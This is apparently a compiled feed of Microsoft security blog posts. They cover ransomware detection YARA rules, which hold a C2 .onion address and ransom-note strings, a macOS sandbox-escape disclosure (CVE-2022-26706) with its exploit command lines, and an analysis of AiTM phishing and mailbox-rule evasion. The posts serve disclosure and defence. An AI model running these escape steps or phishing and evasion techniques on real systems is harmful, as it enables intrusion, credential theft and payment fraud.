Microsoft 365 detections

Microsoft Defender Antivirus

Microsoft Defender for Endpoint

Microsoft Defender for Endpoint customers may see any or a combination of the following alerts as an indication of a possible attack.

  • DEV-0530 activity group
  • Ransomware behavior detected in the file system
  • Possible ransomware infection modifying multiple files
  • Possible ransomware activity

Advanced hunting queries

Microsoft Sentinel

To locate possible DEV-0530 activity mentioned in this blog post, Microsoft Sentinel customers can use the queries detailed below:

Identify DEV-0530 IOCs

This query identifies a match based on IOCs related to DEV-0530 across various Sentinel data feeds:

Identify renamed file extension

DEV-0530 actors are known to encrypt the contents of the victim’s device as well as rename the file and extension. The following query detects the creation of files with .h0lyenc extension:

Identify Microsoft Defender Antivirus detection related to DEV-0530

This query looks for Microsoft Defender Antivirus detections related to DEV-0530 and joins the alert with other data sources to surface additional information such as device, IP, signed-in users, etc.

Yara rules

rule SiennaPurple
{
	meta:
		author = "Microsoft Threat Intelligence Center (MSTIC)"
		description = "Detects PDB path, C2, and ransom note in DEV-0530 Ransomware SiennaPurple samples"
		hash = "99fc54786a72f32fd44c7391c2171ca31e72ca52725c68e2dde94d04c286fccd"
	strings:
		$s1 = "ForOP\\attack(utils)\\attack tools\\Backdoor\\powershell\\btlc_C\\Release\\btlc_C.pdb"
		$s2 = "matmq3z3hiovia3voe2tix2x54sghc3tszj74xgdy4tqtypoycszqzqd.onion"
		// $s3 = ""  (the value of $s3 is missing from the published copy of this rule;
		//            YARA rejects an empty string, so the line is left commented out)
		$s4 = "We are <HolyGhost>. All your important files are stored and encrypted."
		$s5 = "aic^ef^bi^abc0"
		$s6 = "---------------------------3819074751749789153841466081"
	condition:
		uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and
		filesize < 7MB and filesize > 1MB and
		all of ($s*)
}

rule SiennaBlue
{
	meta:
		author = "Microsoft Threat Intelligence Center (MSTIC)"
		description = "Detects Golang package, function, and source file names observed in DEV-0530 Ransomware SiennaBlue samples"
		hash1 = "f8fc2445a9814ca8cf48a979bff7f182d6538f4d1ff438cf259268e8b4b76f86"
		hash2 = "541825cb652606c2ea12fd25a842a8b3456d025841c3a7f563655ef77bb67219"
	strings:
		$holylocker_s1 = "C:/Users/user/Downloads/development/src/HolyLocker/Main/HolyLock/locker.go"
		$holylocker_s2 = "HolyLocker/Main.EncryptionExtension"
		$holylocker_s3 = "HolyLocker/Main.ContactEmail"
		$holylocker_s4 = "HolyLocker/communication.(*Client).GetPubkeyFromServer"
		$holylocker_s5 = "HolyLocker/communication.(*Client).AddNewKeyPairToIntranet"
		$holyrs_s1 = "C:/Users/user/Downloads/development/src/HolyGhostProject/MainFunc/HolyRS/HolyRS.go"
		$holyrs_s2 = "HolyGhostProject/MainFunc.ContactEmail"
		$holyrs_s3 = "HolyGhostProject/MainFunc.EncryptionExtension"
		$holyrs_s4 = "HolyGhostProject/Network.(*Client).GetPubkeyFromServer"
		$holyrs_s5 = "HolyGhostProject/Network.(*Client).AddNewKeyPairToIntranet"
		$s1 = "Our site : <b><a href=%s>H0lyGh0stWebsite"
		$s2 = ".h0lyenc"
		$go_prefix = "Go build ID:"
	condition:
		uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and
		filesize < 7MB and filesize > 1MB and
		$go_prefix and all of ($s*) and (all of ($holylocker_*) or all of ($holyrs_*))
}


Microsoft recognized as a Leader in UEM Software 2022 IDC MarketScape reports

July 13th, 2022

Competition for talent has increased pressure to lead in the digital space, and business decisions now weigh user experience for employees heavily among costs and benefits. Workers insist on experiences that mirror their personal experiences, often on their own devices. As enterprise computing has expanded beyond the cubicle, the need to manage the ensuing explosion of complexity, especially when it comes to device security, has raised the bar for technology and information business decision-makers.

Microsoft has heard consistently that meeting these expanding needs with limited resources is job one. As new solutions seem to emerge as rapidly as the problem itself expands, providing a consistent, proven, centralized portal for endpoint management is how Microsoft aims to be the partner of choice in this space.

The scale of Microsoft—and our investments in endpoint management and endpoint security—affords our customers peace of mind that our solutions will continue to evolve alongside the demands and threats they face. We deliver advanced end-to-end cross-cloud, cross-platform security solutions, which integrate more than 50 different categories across security, compliance, identity, device management, and privacy, informed by more than 24 trillion threat signals we see each day. Proof of customers’ trust and peace of mind: the Microsoft Security business grew more than 45 percent year-over-year, totaling USD15 billion of annual revenue.1

In-person meeting with a masked woman and a man discussing the information shared on screen showing the Microsoft Endpoint Manager admin center All Devices of the endpoints managed from the cloud.

This scale also allows Microsoft to bring a unified endpoint management solution that is tailored for customers’ challenges, especially the transformation to cloud management. Microsoft is recognized as a Leader in the Unified Endpoint Management Software 2022 Vendor Assessment IDC MarketScape report, including Ruggedized/Internet of Things Device Deployments and Small and Midsize Businesses. Microsoft Endpoint Manager is an integrated solution that simplifies management across multiple operating systems, cloud, on-premises, mobile, desktop, and virtualized endpoints.

This quote from the report may be of special interest to customers trying to do more with less:

“Integration is a key aspect of the Microsoft Endpoint Manager offering, and the product ties into a wide range of other tools from the vendor, including Office 365 apps, Teams, and OneDrive as well as Microsoft security products including Microsoft Defender for Endpoint (endpoint security) and Microsoft Sentinel (security information and event management).”

Managing more platforms

In short, IT administrators get more done in one place, with simplified management of multiple operating systems, cloud, on-premises, mobile, desktop, and virtualized endpoints. The IDC MarketScape report calls out the topic of enterprise management for macOS endpoints: 

[Microsoft Endpoint Manager] includes the ability to apply granular policies to Mac software distribution and deployments, broader support for macOS device configuration profiles, and user-based policy enforcement customization.

In 2022, we will further expand across platforms by releasing enhanced support for devices running Android Open Source Project (AOSP), such as Oculus virtual reality (VR) headsets, as well as enable conditional access policies and device settings for Linux desktops. This way, IT can protect data on any devices by securing user apps; configuring, securing, monitoring, and updating apps remotely; and reducing risks with the combination of identity-based management and Microsoft Security.

User-focused experiences

We hear from customers that powerful software is great, but a frictionless experience is better. We try to bring this learning into our product development and continue working to improve not just what control IT admins have over endpoints, but also how they interact with them. How can data be turned into insights? How does portfolio visibility contribute to security?

We understand, too, that users are vested stakeholders in the process, and their satisfaction often determines whether IT can notch up a win or not. Access policies that are too strict can frustrate users or lead to insecure workarounds, so security has to be balanced with usability. We know that the line between home and work is blurred, and so is the line between business and personal devices, so we keep improving the ways we help users do their work where and how they want.

The IDC MarketScape report also recognizes our focus on endpoint analytics that are designed to make suggestions instead of merely presenting data, and to flag anomalies in the continuous stream of health, compliance, and security signals. When an IT admin can take proactive steps instead of making reactive fixes, we notch up a win for everyone.

The improved experience is well described by Grupo Bancolombia, who adopted Endpoint Manager for more flexibility to support employees in the cloud so they can work from anywhere in a secure way. Read the case study to learn more.

This quote from Santiago Santacruz Pareja, Grupo Bancolombia IT Infrastructure Engineer, encapsulates the improved experience for users and IT pros:

We quickly rolled out BitLocker to 23,000 machines, but the best part was that it was invisible to employees—they didn’t notice any changes to their device or daily work, and we succeeded in protecting their data.

Learn more

You’re invited to read the full report or view a snapshot of the IDC MarketScape report below. Keep up with ongoing developments on Unified Endpoint Management (UEM) by visiting the Microsoft Endpoint Manager Tech Community blog and exploring Microsoft Endpoint Manager.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

We thank our customers and partners for being on this journey with us.

Positioning of the IDC MarketScape of worldwide software vendors across Capabilities and Strategies for Unified Endpoint Management. Categories include participants, contenders, major players and leaders with Microsoft showing as a leader ahead of Vmware in Strategies.

IDC MarketScape: Worldwide Unified Endpoint Management Software 2022 Vendor Assessment, Doc #US48325122, May 2022.

1Microsoft Fiscal Year 2022 Second Quarter Earnings Conference Call, Microsoft. January 25, 2022.


Uncovering a macOS App Sandbox escape vulnerability: A deep dive into CVE-2022-26706

July 13th, 2022

Microsoft uncovered a vulnerability in macOS that could allow specially crafted code to escape the App Sandbox and run unrestricted on the system. We shared these findings with Apple through Coordinated Vulnerability Disclosure (CVD) via Microsoft Security Vulnerability Research (MSVR) in October 2021. A fix for this vulnerability, now identified as CVE-2022-26706, was included in the security updates released by Apple on May 16, 2022. Microsoft shares the vulnerability disclosure credit with another researcher, Arsenii Kostromin (0x3c3e), who discovered a similar technique independently.

We encourage macOS users to install these security updates as soon as possible. We also want to thank the Apple product security team for their responsiveness in fixing this issue.

The App Sandbox is Apple’s access control technology that application developers must adopt to distribute their apps through the Mac App Store. Essentially, customizable rules, such as whether specific files may be read or written, are enforced on an app’s processes. The App Sandbox also restricts the processes’ access to system resources and user data to minimize the impact or damage if the app becomes compromised. However, we found that specially crafted code could bypass these rules. An attacker could take advantage of this sandbox escape vulnerability to gain elevated privileges on the affected device or execute malicious commands like installing additional payloads.

We found the vulnerability while researching potential ways to run and detect malicious macros in Microsoft Office on macOS. For backward compatibility, Microsoft Word can read or write files with an “~$” prefix. Our findings revealed that it was possible to escape the sandbox by leveraging macOS’s Launch Services to run an open --stdin command on a specially crafted Python file with the said prefix.

Our research shows that even the built-in, baseline security features in macOS could still be bypassed, potentially compromising system and user data. Therefore, collaboration between vulnerability researchers, software vendors, and the larger security community remains crucial to helping secure the overall user experience. This includes responsibly disclosing vulnerabilities to vendors.

In addition, insights from this case study not only enhance our protection technologies, such as Microsoft Defender for Endpoint, but they also help strengthen the security strategies of software vendors and the computing landscape at large. This blog post thus provides details of our research and overviews of similar sandbox escape vulnerabilities reported by other security researchers that helped enrich our analysis.

How macOS App Sandbox works

In a nutshell, macOS apps can specify sandbox rules for the operating system to enforce on themselves. The App Sandbox restricts system calls to an allowed subset, and the said system calls can be allowed or disallowed based on files, objects, and arguments. Simply put, the sandbox rules are a defense-in-depth mechanism that dictates the kind of operations an application can or can’t do, regardless of the type of user running it. Examples of such operations include:

  • the kind of files an application can or can’t read or write;
  • whether the application can access specific resources such as the camera or the microphone, and;
  • whether the application is allowed to perform inbound or outbound network connections.
Diagram comparing how an app can access user data and system resources without and with App Sandbox.

Without App Sandbox, the app has unrestricted access to all user data and system resources.

With App Sandbox, the app can access only the data and resources that the sandbox grants it; all other user data and resources are out of reach.
Figure 1. Illustration of a sandboxed app, from the App Sandbox documentation (photo credit: Apple)

Therefore, the App Sandbox is a useful tool for all macOS developers in providing baseline security for their applications, especially for those that have large attack surfaces and run user-provided code. One example of these applications is Microsoft Office.

Sandboxing Microsoft Office in macOS

Attackers have targeted Microsoft Office in their attempts to gain a foothold on devices and networks. One of their techniques is abusing Office macros, which they use in social engineering attacks to trick users into downloading malware and other payloads.

On Windows systems, Microsoft Defender Application Guard for Office helps secure Microsoft Office against such macro abuse by isolating the host environment using Hyper-V. With this feature enabled, an attacker must first be equipped with a Hyper-V guest-to-host vulnerability to affect the host system—a very high bar compared to simply running a macro. Without a similar isolation technology and default setting on macOS, Office must rely on the operating system’s existing mitigation strategies. Currently, the most promising technology is the macOS App Sandbox.

Viewing the Microsoft sandbox rules is quite straightforward with the codesign utility. Figure 2 below shows the truncated sandbox rules for Microsoft Word:

Partial screenshot of a command line interface showing different keys and values related to the App Sandbox rules for Microsoft Word in macOS.
Figure 2. Viewing the Microsoft Word sandbox rules with the codesign utility

One of the rules dictates the kind of files the application is allowed to read or write. As seen in the screenshot of the syntax below, Word is allowed to read or write files with filenames that start with the “~$” prefix. The reason for this rule is rooted in the way Office works internally and remains intact for backward compatibility.

Partial screenshot of a command line interface showing the read/write App Sandbox rule for Microsoft Word in macOS.
Figure 3. File read and write sandbox rule for Microsoft Word

Despite the security restrictions imposed by the App Sandbox’s rules on applications, it’s possible for attackers to bypass the said rules and let malicious code “escape” the sandbox and execute arbitrary commands on an affected device. This code could be hidden in a specially crafted Word macro, which, as mentioned earlier, is one of the attackers’ preferred entry points.

Previously reported Office-specific sandbox escape vulnerability

For example, in 2018, MDSec reported a vulnerability in Microsoft Office on macOS that could allow an attacker to bypass the App Sandbox. As explained in their blog post, MDSec’s proof-of-concept (POC) exploit took advantage of the fact that Word could drop files with arbitrary contents to arbitrary directories (even after passing traditional permission checks), as long as these files’ filenames began with a “~$” prefix. This bypass was relatively straightforward: have a specially crafted macro drop a .plist file in the user’s LaunchAgents directory.

The LaunchAgents directory is a well-known persistence mechanism in macOS. PLIST files that adhere to a specific structure describe (that is, contain the metadata of) macOS launch agents initiated by the launchd process when a user signs in. Since these launch agents will be the children of launchd, they won’t inherit the sandbox rules enforced onto Word, and therefore will be out of the Office sandbox.

Shortly after the above vulnerability was reported, Microsoft deployed a fix that denied file writes to the LaunchAgents directory and other folders with similar implications. The said disclosure also prompted us to look into different possible sandbox escapes in Microsoft Word and other applications.

Exploring Launch Services as a means of escaping the sandbox

In 2020, several blog posts described a generic sandbox escape vulnerability in macOS’s /usr/bin/open utility, a command commonly used to launch files, folders, and applications just as if a user double-clicked them. While open is a handy command, it doesn’t create child processes on its own. Instead, it performs an inter-process communication (IPC) with the macOS Launch Services, whose logic is implemented in the context of the launchd process. Launch Services then performs the heavy lifting by resolving the handler and launching the right app. Since launchd creates the process, it’s not restricted by the caller’s sandbox, similar to how MDSec’s POC exploit worked in 2018.

However, using open for sandbox escape purposes isn’t trivial because the destination app must be registered within Launch Services. This means that, for example, one couldn’t run files like osascript outside the sandbox using open. Our internal offensive security team therefore decided to reassess the open utility for sandbox escape purposes and use it in a larger end-to-end attack simulation.

Our obvious first attempt in creating a POC exploit was to create a macro that launches a shell script with the Terminal app. Surprisingly, the POC didn’t work because files dropped from within the sandboxed Word app were automatically given the quarantine extended attribute (the same one used by Safari to keep track of internet-downloaded files, as well as by Gatekeeper to block malicious files from executing), and Terminal simply refused to run files with that attribute. We also tried using Python scripts, but the Python app had similar issues running files having the said attribute.

Our second attempt was to use application extensibility features. For example, Terminal would run the default macOS shell (zsh), which would then run arbitrary commands from files like ~/.zshenv before running its own command line. This meant that dropping a .zshenv file in the user’s home directory and launching the Terminal app would cause the sandbox escape. However, due to Word’s sandbox rules, dropping a .zshenv file wasn’t straightforward, as the rules only allowed an application to write to files that begin with the “~$” prefix.

However, there is an interesting way of writing such a file indirectly. macOS shipped with an application called Archive Utility, which is responsible for extracting archive files (such as ZIP files). Such archives were extracted without any user interaction, and the files inside an archive were extracted into the same directory as the archive itself. Therefore, our second POC worked as follows:

  1. Prepare the payload by creating a .zshenv file with arbitrary commands and placing it in a ZIP file. Encode the ZIP file contents in a Word macro and drop those contents into a file “~$” in the user’s home directory.
  2. Launch Archive Utility with the open command on the “~$” file. Archive Utility ran outside the sandbox (since it’s the child process of /usr/bin/open) and was therefore permitted to create files with arbitrary names. By default, Archive Utility extracted the files next to the archive itself—in our case, the user’s home directory. Therefore, this step successfully created a .zshenv file with arbitrary contents in the user’s home directory.
  3. Launch the Terminal app with the open command. Since Terminal hosted zsh and zsh ran commands from the .zshenv file, the said file could escape the Word sandbox successfully.
Screenshot of a command line interface showing proof-of-concept exploit code.
Figure 4. Preparing a Word macro with our sandbox escape for an internal Red Team operation

Perception Point’s CVE-2021-30864

In October 2021, Perception Point published a blog post that discussed a similar (and, in our opinion, more elegant) finding. In the said post, Perception Point released details about their sandbox escape (now identified as CVE-2021-30864), which used the following facts:

  1. Every sandboxed process had its own container directory that’s used as a “scratch space.” The sandboxed process could write arbitrary files, including arbitrary filenames, to that directory unrestricted.
  2. The open command had an interesting --env option that could set or override arbitrary environment variables for the launched app.

Therefore, Perception Point’s POC exploit was cleverly simple:

  1. Drop a .zshenv file in the container directory. This was allowed because sandbox rules weren’t enforced on that directory.
  2. Launch Terminal with the open command but use the --env option to override the HOME environment variable to point to the container directory. This made zsh consider the user’s home directory to be the container directory, and run commands from the planted .zshenv file.

Apple has since patched the vulnerability Perception Point reported in the latest version of macOS, Monterey. While we could still create the “~$” file in the user’s home directory, using open to launch the Archive Utility on the ZIP file now resulted in it being extracted to the Downloads folder. While this is an interesting behavior, we could no longer use it for sandbox escape purposes.

Final exploit attempt: Revisiting the ‘open’ command

After discovering that Apple had fixed both variants that abuse .zshenv, we decided to examine all the command line options of the open command. Soon after, we came across the following:

Screenshot of a command line interface with the following text:

--stdin PATH
       Launches the application with stdin connected to PATH.
Figure 5. The --stdin option in the open utility as presented by its manual entry

As mentioned earlier, we couldn’t run Python with a dropped .py file since Python refuses to run files with the quarantine extended attribute. We also considered abusing the PYTHONSTARTUP environment variable, but Apple’s fix to CVE-2021-30864 apparently prevented that option, too. However, --stdin bypassed the quarantine extended attribute restriction, as there was no way for Python to know that the contents from its standard input originated from a quarantined file.

Our POC exploit thus became simply as follows:

  1. Drop a “~$” file with arbitrary Python commands.
  2. Run open --stdin='~$' -a Python, which runs the Python app with our dropped file serving as its standard input. Python happily runs our code, and since it’s a child process of launchd, it isn’t bound to Word’s sandbox rules.
Screenshot of a proof-of-concept exploit code.
Figure 6. Sample minimal POC exploit code

We also came up with a version that’s short enough to be a Twitter post:

Screenshot of a proof-of-concept exploit code.
Figure 7. “Tweetable” POC exploit

Detecting App Sandbox escapes with Microsoft Defender for Endpoint

Since our initial discovery of leveraging Launch Services in macOS for generic sandbox escapes, we have been using our POC exploits in Red Team operations to emulate end-to-end attacks against Microsoft Defender for Endpoint, improve its capabilities, and challenge our detections. Shortly after our Red Team used our first POC exploit, our Blue Team members used it to train artificial intelligence (AI) models to detect our exploit not only in Microsoft Office but also on any app used for a similar Launch Services-based sandbox escape.

After we learned of Perception Point’s technique and created our own new exploit technique (the Python POC), our Red Team saw another opportunity to fully test our own detection durability. Indeed, the same set of detection rules that handled our first sandbox escape vulnerability still turned out to be durable—even before the vulnerability related to our second POC exploit was patched.

Partial screenshot of Microsoft Defender for Endpoint detecting an Office sandbox escape vulnerability. 

The left panel shows the Alert Story with timestamps. The right panel shows the Alert details, including category, MITRE ATT&CK techniques, detection source, service source, detection status, and other information.
Figure 8. Microsoft Defender for Endpoint detecting Office sandbox escape

For Defender for Endpoint customers, such detection durability feeds into the product’s threat and vulnerability management capabilities, which allows them to quickly discover, prioritize, and remediate misconfigurations and vulnerabilities—including those affecting non-Windows devices—through a unified security console.
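As an added illustration of the detection side (not Microsoft Defender for Endpoint’s own logic), the following Python walks constructed process telemetry and flags /usr/bin/open invocations spawned by a sandboxed Office app that show the Launch Services escape patterns discussed above: a “~$”-prefixed argument, --stdin, --env, or a Terminal, Python or Archive Utility target. The event fields, app lists and sample events are assumptions made for this example.

```python
import os
import shlex
from dataclasses import dataclass, field

# Apps whose sandbox rules only let them write '~$'-prefixed files (as the post
# shows for Word). Constructed list for this example; extend it as needed.
SANDBOXED_APPS = {"Microsoft Word", "Microsoft Excel", "Microsoft PowerPoint"}

# Launch Services targets the post names as useful to an escape: a shell or
# interpreter host, or a tool that writes arbitrary file names outside the sandbox.
ESCAPE_TARGETS = {"Terminal", "Python", "Archive Utility"}


@dataclass
class ProcEvent:
    ts: str        # event timestamp (constructed)
    parent: str    # name of the parent process that spawned the child
    cmdline: str   # full command line of the child process


@dataclass
class Finding:
    ts: str
    parent: str
    reasons: list = field(default_factory=list)


def analyze_open(cmdline: str) -> list:
    """Return the reasons a /usr/bin/open command line matches an escape pattern."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:            # unbalanced quotes: nothing we can parse
        return []
    if not argv or os.path.basename(argv[0]) != "open":
        return []

    reasons = []
    target_app = None
    i = 1
    while i < len(argv):
        tok = argv[i]
        # Value to check for the '~$' prefix: an --opt=value payload or a positional path
        value = tok.split("=", 1)[1] if tok.startswith("--") and "=" in tok else None
        if tok == "-a" and i + 1 < len(argv):
            target_app = argv[i + 1]      # the app Launch Services will start
            i += 2
            continue
        if tok.startswith("--stdin"):
            reasons.append("--stdin hands the app file contents with no quarantine check")
            if value is None and i + 1 < len(argv):
                value = argv[i + 1]       # '--stdin PATH' form
                i += 1
        elif tok.startswith("--env"):
            reasons.append("--env overrides the launched app's environment (CVE-2021-30864 pattern)")
        elif not tok.startswith("-"):
            value = tok                   # positional argument: file or URL to open
        if value is not None and os.path.basename(value).startswith("~$"):
            reasons.append("operates on a '~$'-prefixed file, the only kind Word may write")
        i += 1

    if target_app in ESCAPE_TARGETS:
        reasons.append(f"starts {target_app} as a child of launchd, outside the caller's sandbox")
    return reasons


def detect(events) -> list:
    """Run analyze_open over every command line whose parent is a sandboxed app."""
    findings = []
    for ev in events:
        if ev.parent not in SANDBOXED_APPS:
            continue
        reasons = analyze_open(ev.cmdline)
        if reasons:
            findings.append(Finding(ev.ts, ev.parent, reasons))
    return findings


# Constructed telemetry: a Word session invoking open in the ways the post describes,
# plus two control events that should not fire.
SAMPLE_EVENTS = [
    ProcEvent("2022-06-01T10:00:01", "Microsoft Word", "open --stdin='~$payload.py' -a Python"),
    ProcEvent("2022-06-01T10:00:05", "Microsoft Word", "open '~$bundle.zip'"),
    ProcEvent("2022-06-01T10:00:09", "Microsoft Word", "open -a Terminal"),
    ProcEvent("2022-06-01T10:01:00", "Microsoft Word", "open https://www.example.com/"),
    ProcEvent("2022-06-01T10:02:00", "Safari", "open --stdin=notes.txt -a Python"),
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f.ts} {f.parent}: " + "; ".join(f.reasons))
```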

Learn how Microsoft Defender for Endpoint delivers a complete endpoint security solution across all platforms.

Jonathan Bar Or
Microsoft 365 Defender Research Team

The post Uncovering a macOS App Sandbox escape vulnerability: A deep dive into CVE-2022-26706 appeared first on Microsoft Security Blog.

All Hands-on Deck: A Whole-of-Society Approach for Cybersecurity

The morning of June 9th, I was driving over the Golden Gate Bridge into San Francisco with my family. While crossing the bridge my children shared some facts about this modern engineering marvel. Each day, approx. 100,000 vehicles travel over the bridge deck, which weighs a staggering 150,000 tons, and is suspended by 250 pairs …



Microsoft Mitigates Azure Site Recovery Vulnerabilities

July 12th, 2022

Summary: Microsoft recently mitigated a set of vulnerabilities in Azure Site Recovery (ASR) and released fixes today, July 12, as part of our regular Update Tuesday cycle. These vulnerabilities affect all ASR on-premises customers using a VMware/Physical to Azure scenario and are fixed in the latest ASR 9.49 release. We recommend customers update to the …



From cookie theft to BEC: Attackers use AiTM phishing sites as entry point to further financial fraud

July 12th, 2022

A large-scale phishing campaign that used adversary-in-the-middle (AiTM) phishing sites stole passwords, hijacked a user’s sign-in session, and skipped the authentication process even if the user had enabled multifactor authentication (MFA). The attackers then used the stolen credentials and session cookies to access affected users’ mailboxes and perform follow-on business email compromise (BEC) campaigns against other targets. Based on our threat data, the AiTM phishing campaign attempted to target more than 10,000 organizations since September 2021.

Diagram containing icons and arrows illustrating the sequence of steps in an AiTM phishing campaign.
Figure 1. Overview of AiTM phishing campaign and follow-on BEC

Phishing remains one of the most common techniques attackers use in their attempts to gain initial access to organizations. According to the 2021 Microsoft Digital Defense Report, reports of phishing attacks doubled in 2020, and phishing is the most common type of malicious email observed in our threat signals. MFA provides an added security layer against credential theft, and it is expected that more organizations will adopt it, especially in countries and regions where even governments are mandating it. Unfortunately, attackers are also finding new ways to circumvent this security measure.

In AiTM phishing, attackers deploy a proxy server between a target user and the website the user wishes to visit (that is, the site the attacker wishes to impersonate). Such a setup allows the attacker to steal and intercept the target’s password and the session cookie that proves their ongoing and authenticated session with the website. Note that this is not a vulnerability in MFA; since AiTM phishing steals the session cookie, the attacker gets authenticated to a session on the user’s behalf, regardless of the sign-in method the latter uses.

Microsoft 365 Defender detects suspicious activities related to AiTM phishing attacks and their follow-on activities, such as session cookie theft and attempts to use the stolen cookie to sign into Exchange Online. However, to further protect themselves from similar attacks, organizations should also consider complementing MFA with conditional access policies, where sign-in requests are evaluated using additional identity-driven signals like user or group membership, IP location information, and device status, among others. 

While AiTM phishing isn’t new, our investigation allowed us to observe and analyze the follow-on activities stemming from the campaign—including cloud-based attack attempts—through cross-domain threat data from Microsoft 365 Defender. These observations also let us improve and enrich our solutions’ protection capabilities. This campaign thus also highlights the importance of building a comprehensive defense strategy. As the threat landscape evolves, organizations need to assume breach and understand their network and threat data to gain complete visibility and insight into complex end-to-end attack chains.

In this blog, we’ll share our technical analysis of this phishing campaign and the succeeding payment fraud attempted by the attackers. We’ll also provide guidance for defenders on protecting organizations from this threat and how Microsoft security technologies detect it.

How AiTM phishing works

Every modern web service implements a session with a user after successful authentication so that the user doesn’t have to be authenticated at every new page they visit. This session functionality is implemented through a session cookie provided by an authentication service after initial authentication. The session cookie is proof for the web server that the user has been authenticated and has an ongoing session on the website. In AiTM phishing, an attacker attempts to obtain a target user’s session cookie so they can skip the whole authentication process and act on the latter’s behalf.  

To do this, the attacker deploys a web server that proxies HTTP packets from the user who visits the phishing site to the target server the attacker wishes to impersonate, and the other way around. This way, the phishing site is visually identical to the original website (as every HTTP request and response is proxied to and from the original website). The attacker also doesn’t need to craft their own phishing site as is done in conventional phishing campaigns. The URL is the only visible difference between the phishing site and the actual one.

Figure 2 below illustrates the AiTM phishing process:

Diagram with icons illustrates a phishing site, which is connected to a malicious proxy server, in between a user and the target website the user is trying to access. Texts and arrows describe the process of how the AiTM phishing website intercepts the authentication process.
Figure 2. AiTM phishing website intercepting the authentication process

The phishing page has two different Transport Layer Security (TLS) sessions—one with the target and another with the actual website the target wants to access. These sessions mean that the phishing page practically functions as an AiTM agent, intercepting the whole authentication process and extracting valuable data from the HTTP requests such as passwords and, more importantly, session cookies. Once the attacker obtains the session cookie, they can inject it into their browser to skip the authentication process, even if the target’s MFA is enabled. 

The AiTM phishing process can currently be automated using open-source phishing toolkits and other online resources. Widely used kits include Evilginx2, Modlishka, and Muraena.

Tracking an AiTM phishing campaign

Using Microsoft 365 Defender threat data, we detected multiple iterations of an AiTM phishing campaign that attempted to target more than 10,000 organizations since September 2021. These runs appear to be linked together and target Office 365 users by spoofing the Office online authentication page.

Based on our analysis, these campaign iterations use the Evilginx2 phishing kit as their AiTM infrastructure. We also uncovered similarities in their post-breach activities, including sensitive data enumeration in the target’s mailbox and payment fraud.

Initial access

In one of the runs we’ve observed, the attacker sent emails with an HTML file attachment to multiple recipients in different organizations. The email message informed the target recipients that they had a voice message.

Screenshot of a phishing email message with an HTML file attachment.
Figure 3. Sample phishing email with HTML file attachment

When a recipient opened the attached HTML file, it was loaded in the user’s browser and displayed a page informing the user that the voice message was being downloaded. Note, however, that the download progress bar was hardcoded in the HTML file, so no MP3 file was being fetched.

Partial screenshot of an HTML page with the text "Please Wait while we fetch your voice message." Below the text is a progress bar indicator with the label "Downloading progress:".
Figure 4. HTML file attachment loaded in the target’s browser
Screenshot of an HTML source code with redacted email address.
Figure 5. Source code of the HTML attachment

Instead, the page redirected the user to a redirector site:

Partial screenshot of a web page that has the Microsoft logo and the following message:
"You will be redirected back to your mail box with audio sent in 1 hour...

to continue".
Figure 6. Screenshot of the redirector site

This redirector acted as a gatekeeper to ensure the target user was coming from the original HTML attachment. To do this, it first validated if the expected fragment value in the URL—in this case, the user’s email address encoded in Base64—exists. If the said value existed, this page concatenated the value on the phishing site’s landing page, which was also encoded in Base64 and saved in the “link” variable (see Figure 7 below).

Screenshot of an HTML source code containing redirection logic.
Figure 7. A redirection logic included in the <script> tag of the redirector site

By combining the two values, the succeeding phishing landing page automatically filled out the sign-in page with the user’s email address, thus enhancing its social engineering lure. This technique was also the campaign’s attempt to prevent conventional anti-phishing solutions from directly accessing phishing URLs.

Note that in other instances, we observed that the redirector page used the following URL format:

hxxp://[username].[wildcard domain].[tld]/#[user email encoded in Base64]

In this format, the target’s username was used as part of an infinite subdomains technique, which we have previously discussed in other phishing campaigns.

Partial screenshot of a web page that has the Microsoft logo and a "please wait..." message.
Figure 8. Evasive redirector site loaded on the target’s browser

After the redirection, the user finally landed on an Evilginx2 phishing site with their username as a fragment value. For example:

Screenshot of a spoofed sign-in page with Microsoft logo.
Figure 9. Sample phishing landing page

The phishing site proxied the organization’s Azure Active Directory (Azure AD) sign-in page, which is typically If the organization had configured their Azure AD to include their branding, the phishing site’s landing page also contained the same branding elements.

Partial screenshot of a mockup sign-in page with Contoso logo.
Figure 10. A mockup of a phishing landing page that retrieves the Azure AD branding of an organization

Once the target entered their credentials and got authenticated, they were redirected to the legitimate page. However, in the background, the attacker intercepted the said credentials and got authenticated on the user’s behalf. This allowed the attacker to perform follow-on activities—in this case, payment fraud—from within the organization.

Post-breach BEC

Payment fraud is a scheme wherein an attacker tricks a fraud target into transferring payments to attacker-owned accounts. It can be achieved by hijacking and replying to ongoing finance-related email threads in the compromised account’s mailbox and luring the fraud target to send money through fake invoices, among others.

Based on our analysis of Microsoft 365 Defender threat data and our investigation of related threat alerts from our customers, we discovered that it took as little as five minutes after credential and session theft for an attacker to launch their follow-on payment fraud. From our observation, after a compromised account signed into the phishing site for the first time, the attacker used the stolen session cookie to authenticate to Outlook online ( In multiple cases, the cookies had an MFA claim, which means that even if the organization had an MFA policy, the attacker used the session cookie to gain access on behalf of the compromised account.

Finding a target

In the days following the cookie theft, the attacker accessed finance-related emails and file attachments every few hours. They also searched for ongoing email threads where payment fraud would be feasible. In addition, the attacker deleted from the compromised account’s Inbox folder the original phishing email they sent to hide traces of their initial access.

These activities suggest the attacker attempted to commit payment fraud manually. They also did this in the cloud—they used Outlook Web Access (OWA) on a Chrome browser and performed the abovementioned activities while using the compromised account’s stolen session cookie.

Once the attacker found a relevant email thread, they proceeded with their evasion techniques. Because they didn’t want the compromised account’s user to notice any suspicious mailbox activities, the attacker created an Inbox rule with the following logic to hide any future replies from the fraud target:

“For every incoming email where sender address contains [domain name of the fraud target], move the mail to “Archive” folder and mark it as read.”

Conducting payment fraud

Right after the rule was set, the attacker proceeded to reply to ongoing email threads related to payments and invoices between the target and employees from other organizations, as indicated in the created Inbox rule. The attacker then deleted their replies from the compromised account’s Sent Items and Deleted Items folders.

Several hours after the initial fraud attempt was performed, the attacker signed in once every few hours to check if the fraud target replied to their email. In multiple instances, the attacker communicated with the target through emails for a few days. After sending back responses, they deleted the target’s replies from the Archive folder. They also deleted their emails from the Sent Items folder.

